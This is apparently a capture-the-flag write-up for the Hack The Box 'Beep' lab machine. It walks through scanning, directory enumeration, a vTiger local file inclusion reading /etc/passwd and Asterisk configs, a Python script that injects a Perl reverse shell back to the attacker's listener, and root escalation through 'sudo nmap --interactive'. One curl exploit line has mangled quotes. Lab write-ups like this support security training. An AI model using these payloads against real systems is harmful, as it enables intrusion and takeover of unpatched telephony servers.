Beep
Introduction:
Recon
1# nmap -sS -sV -sC -T4 -O -oN nmap.beep.txt 10.10.10.7
2Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-23 11:21 EST
3Nmap scan report for 10.10.10.7
4Host is up (0.014s latency).
5Not shown: 988 closed ports
6PORT STATE SERVICE VERSION
722/tcp open ssh OpenSSH 4.3 (protocol 2.0)
8| ssh-hostkey:
9| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
10|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
1125/tcp open smtp Postfix smtpd
12|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
1380/tcp open http Apache httpd 2.2.3
14|_http-server-header: Apache/2.2.3 (CentOS)
15|_http-title: Did not follow redirect to https://10.10.10.7/
16110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
17|_pop3-capabilities: TOP EXPIRE(NEVER) UIDL IMPLEMENTATION(Cyrus POP3 server v2) USER LOGIN-DELAY(0) APOP PIPELINING AUTH-RESP-CODE RESP-CODES STLS
18111/tcp open rpcbind 2 (RPC #100000)
19| rpcinfo:
20| program version port/proto service
21| 100000 2 111/tcp rpcbind
22| 100000 2 111/udp rpcbind
23| 100024 1 875/udp status
24|_ 100024 1 878/tcp status
25143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
26|_imap-capabilities: SORT=MODSEQ THREAD=REFERENCES RENAME CONDSTORE ATOMIC IDLE RIGHTS=kxte URLAUTHA0001 IMAP4 MULTIAPPEND LISTEXT QUOTA THREAD=ORDEREDSUBJECT ACL MAILBOX-REFERRALS CATENATE UNSELECT CHILDREN UIDPLUS STARTTLS NO Completed ANNOTATEMORE IMAP4rev1 BINARY LIST-SUBSCRIBED X-NETSCAPE ID LITERAL+ NAMESPACE OK SORT
27443/tcp open ssl/https?
28| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
29| Not valid before: 2017-04-07T08:22:08
30|_Not valid after: 2018-04-07T08:22:08
31|_ssl-date: 2020-12-23T17:32:57+00:00; +1h07m58s from scanner time.
32993/tcp open ssl/imap Cyrus imapd
33|_imap-capabilities: CAPABILITY
34995/tcp open pop3 Cyrus pop3d
353306/tcp open mysql MySQL (unauthorized)
36|_ssl-cert: ERROR: Script execution failed (use -d to debug)
37|_ssl-date: ERROR: Script execution failed (use -d to debug)
38|_sslv2: ERROR: Script execution failed (use -d to debug)
39|_tls-alpn: ERROR: Script execution failed (use -d to debug)
40|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
414445/tcp open upnotifyp?
4210000/tcp open http MiniServ 1.570 (Webmin httpd)
43|_http-server-header: MiniServ/1.570
44|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
45No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
46TCP/IP fingerprint:
47OS:SCAN(V=7.91%E=4%D=12/23%OT=22%CT=1%CU=34600%PV=Y%DS=2%DC=I%G=Y%TM=5FE370
48OS:12%P=x86_64-pc-linux-gnu)SEQ(SP=CA%GCD=1%ISR=C8%TI=Z%CI=Z%II=I%TS=A)OPS(
49OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
50OS:NW7%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(
51OS:R=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
52OS:%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11NW7%RD=0
53OS:%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z
54OS:%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y
55OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RI
56OS:PL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
57
58Network Distance: 2 hops
59Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com
60
61Host script results:
62|_clock-skew: 1h07m57s
63
64OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
65Nmap done: 1 IP address (1 host up) scanned in 404.56 seconds
66
Notes:
- This host has several open ports that we can enumerate on for smtp/pop mail server (Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4), web (Apache httpd 2.2.3 80/143), mysql on 3306 and webmin on 10000 (MiniServ 1.570)
- Also, this port looks intersting - 4445/tcp open upnotifyp?
- Lets get directory search, nikto scanner started as we head to manually enumerating some of these services.
- Port 4445 has some interesting process running (upnotifyp?)
Lets venture into further enumerating these services.
Enumeration
1gobuster dir -u https://10.10.10.7 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 24
2===============================================================
3Gobuster v3.0.1
4by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
5===============================================================
6[+] Url: https://10.10.10.7
7[+] Threads: 24
8[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
9[+] Status codes: 200,204,301,302,307,401,403
10[+] User Agent: gobuster/3.0.1
11[+] Timeout: 10s
12===============================================================
132020/12/23 20:34:17 Starting gobuster
14===============================================================
15/images (Status: 301) php/webapps/36208.txt
16/modules (Status: 301)
17/mail (Status: 301)
18/admin (Status: 301)
19/static (Status: 301)
20/lang (Status: 301)
21/var (Status: 301)
22/panel (Status: 301)
23/libs (Status: 301)
24/recordings (Status: 301)
25/configs (Status: 301)
26/vtigercrm (Status: 301)
27
28===============================================================
292020/12/23 21:04:38 Finished
30===============================================================
31
Webmin
1perl ./746.pl 10.10.10.7 "cat /etc/passwd" /usr/share/wordlists/metasploit/common_roots.txt
2[+] BruteForcing...
3[+] trying to enter with: vagrant
4
5[+] trying to enter with: zzzzzz
6
7[+] trying to enter with: zzzz
Notes:
- Only found RCE using brute force if CGI
FreePBX
–eep3nij21fmi31nn1k42gvaa33 –skiuq1tvjiktck245o04vckp32
curl -ks -m20 http://10.10.10.7/recordings/index.php" –cookie “ari_lang=() { :;};php -r ‘set_time_limit(0);unlink(“page.framework.php”);file_put_contents(“misc/audio.php”, “");';ari_auth=O:8:“DB_mysql”:6:{s:19:"_default_error_mode”;i:16;s:22:"_default_error_options”;s:9:“do_reload”;s:12:"_error_class";s:4:“TEST”;s:13:“was_connected”;b:1;s:7:“options”;s:3:“123”;s:3:“dsn”;a:4:{s:8:“hostspec”;s:9:“localhost”;s:8:“username”;s:4:“root”;s:8:“password”;s:0:"";s:8:“database”;s:7:“trigger”;}};elastixSession=716ratk092555gl0b3gtvt8fo7;UICSESSION=rporp4c88hg63sipssop3kdmn2;ARI=b8e4h6vfg0jouquhkcblsouhk0" –data “username=admin&password=admin&submit=btnSubmit” >/dev/null
vTiger CRM 5.1.0
1 searchsploit -x php/webapps/18770.txt
2
1root:x:0:0:root:/root:/bin/bash
2bin:x:1:1:bin:/bin:/sbin/nologin
3daemon:x:2:2:daemon:/sbin:/sbin/nologin
4adm:x:3:4:adm:/var/adm:/sbin/nologin
5lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
6sync:x:5:0:sync:/sbin:/bin/sync
7shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
8halt:x:7:0:halt:/sbin:/sbin/halt
9mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
10news:x:9:13:news:/etc/news:
11uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
12operator:x:11:0:operator:/root:/sbin/nologin
13games:x:12:100:games:/usr/games:/sbin/nologin
14gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
15ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
16nobody:x:99:99:Nobody:/:/sbin/nologin
17mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
18distcache:x:94:94:Distcache:/:/sbin/nologin
19vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
20pcap:x:77:77::/var/arpwatch:/sbin/nologin
21ntp:x:38:38::/etc/ntp:/sbin/nologin
22cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
23dbus:x:81:81:System message bus:/:/sbin/nologin
24apache:x:48:48:Apache:/var/www:/sbin/nologin
25mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
26rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
27postfix:x:89:89::/var/spool/postfix:/sbin/nologin
28asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
29rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
30nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
31sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
32spamfilter:x:500:500::/home/spamfilter:/bin/bash
33haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
34xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
35fanis:x:501:501::/home/fanis:/bin/bash
Since we can now read the files on the machine, lets identify the files that we need to read -
I came across following for FreePBX http://www.telecomworld101.com/PiaF/ConfigurationFiles.html
1view-source:https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf%00
Hit a jackpot with manager.conf
1view-source:https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00
Exploitation
1import urllib
2import time
3rhost="10.10.10.7"
4lhost="10.10.14.15"
5lport=4444
6extension=100
7
8# Reverse shell payload
9while extension < 10000:
10 print ("Trying extenstion: " + str(extension))
11 url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
12 urllib.urlopen(url)
13 extension = extension + 1
14 time.sleep(1)
15
1eneloop@kinetic:~$ nc -lvnp 4444
2listening on [any] 4444 ...
3ls
4ls
5ls
6
7
8
9
10ls
11connect to [10.10.14.15] from (UNKNOWN) [10.10.10.7] 43606
12ks-script-_a_xql
13ks-script-_a_xql.log
14ntpC5OCyW
15sess_0haarafa2oid2474ul72j7tm50
16sess_0t33dvgla1rjtvdv6p3dkcf0f0
17sess_0v7d3flgjto7aj324diuic14r1
18sess_1087i5oq6r9kdmv9tb0juhs077
19sess_13ig3hjnkmcuq46fn2gvf7qmr6
20
Post-exploit/PrivEsc
1whoami
2asterisk
3python -c 'import pty;pty.spawn("/bin/bash");'
4bash-3.2$ cd
5cd
6bash-3.2$ ls
7ls
8bin dev home lost+found mnt proc sbin srv tftpboot usr
9boot etc lib media opt root selinux sys tmp var
10bash-3.2$ cd /home/
11cd /home/
12bash-3.2$ cd asterisk
13cd asterisk
14bash: cd: asterisk: No such file or directory
15bash-3.2$ pwd
16pwd
17/home
18bash-3.2$ ls
19ls
20fanis spamfilter
21bash-3.2$ cd fanis
22cd fanis
23bash-3.2$ ls
24ls
25user.txt
26bash-3.2$ cat us
27cat user.txt
285dbd43c8c1542961dcff41f970a1bcd7
29
30bash-3.2$ sudo -l
31sudo -l
32Matching Defaults entries for asterisk on this host:
33 env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
34 LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
35 LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
36 LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
37 XAUTHORITY"
38
39User asterisk may run the following commands on this host:
40 (root) NOPASSWD: /sbin/shutdown
41 (root) NOPASSWD: /usr/bin/nmap
42 (root) NOPASSWD: /usr/bin/yum
43 (root) NOPASSWD: /bin/touch
44 (root) NOPASSWD: /bin/chmod
45 (root) NOPASSWD: /bin/chown
46 (root) NOPASSWD: /sbin/service
47 (root) NOPASSWD: /sbin/init
48 (root) NOPASSWD: /usr/sbin/postmap
49 (root) NOPASSWD: /usr/sbin/postfix
50 (root) NOPASSWD: /usr/sbin/saslpasswd2
51 (root) NOPASSWD: /usr/sbin/hardware_detector
52 (root) NOPASSWD: /sbin/chkconfig
53 (root) NOPASSWD: /usr/sbin/elastix-helper
54
PrivEsc
1bash-3.2$ sudo nmap --interactive
2sudo nmap --interactive
3
4Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
5Welcome to Interactive Mode -- press h <enter> for help
6nmap> !sh
7!sh
8sh-3.2# whoami
9whoami
10root
11sh-3.2#
12
Notes: